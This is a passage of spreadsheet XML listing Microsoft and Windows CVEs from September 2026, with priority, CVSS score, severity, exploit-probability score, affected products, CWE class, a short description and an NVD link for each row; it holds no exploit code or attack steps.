          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L277" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="C278" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E278" s="5" t="inlineStr"/>
      <c r="F278" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G278" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H278" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="C279" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E279" s="5" t="inlineStr"/>
      <c r="F279" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G279" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H279" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="C280" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E280" s="5" t="inlineStr"/>
      <c r="F280" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G280" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H280" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="C281" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E281" s="5" t="inlineStr"/>
      <c r="F281" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G281" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="C282" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E282" s="5" t="inlineStr"/>
      <c r="F282" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G282" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="C283" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E283" s="5" t="inlineStr"/>
      <c r="F283" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G283" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="C284" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E284" s="5" t="inlineStr"/>
      <c r="F284" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G284" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="C285" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E285" s="5" t="inlineStr"/>
      <c r="F285" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G285" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="C286" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E286" s="5" t="inlineStr"/>
      <c r="F286" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G286" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="C287" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E287" s="5" t="inlineStr"/>
      <c r="F287" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G287" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="C288" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E288" s="5" t="inlineStr"/>
      <c r="F288" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G288" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H288" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="C289" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E289" s="5" t="inlineStr"/>
      <c r="F289" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G289" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="C290" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E290" s="5" t="inlineStr"/>
      <c r="F290" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G290" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H290" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L290" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="C291" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E291" s="5" t="inlineStr"/>
      <c r="F291" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G291" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H291" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="C292" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E292" s="5" t="inlineStr"/>
      <c r="F292" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G292" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L292" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="C293" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E293" s="5" t="inlineStr"/>
      <c r="F293" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G293" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="C294" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E294" s="5" t="inlineStr"/>
      <c r="F294" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G294" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="C295" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E295" s="5" t="inlineStr"/>
      <c r="F295" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G295" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="C296" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E296" s="5" t="inlineStr"/>
      <c r="F296" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G296" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="C297" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E297" s="5" t="inlineStr"/>
      <c r="F297" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G297" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H297" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="C298" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E298" s="5" t="inlineStr"/>
      <c r="F298" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G298" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L298" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="C299" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G299" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="C300" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G300" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H300" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L300" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="C301" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G301" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
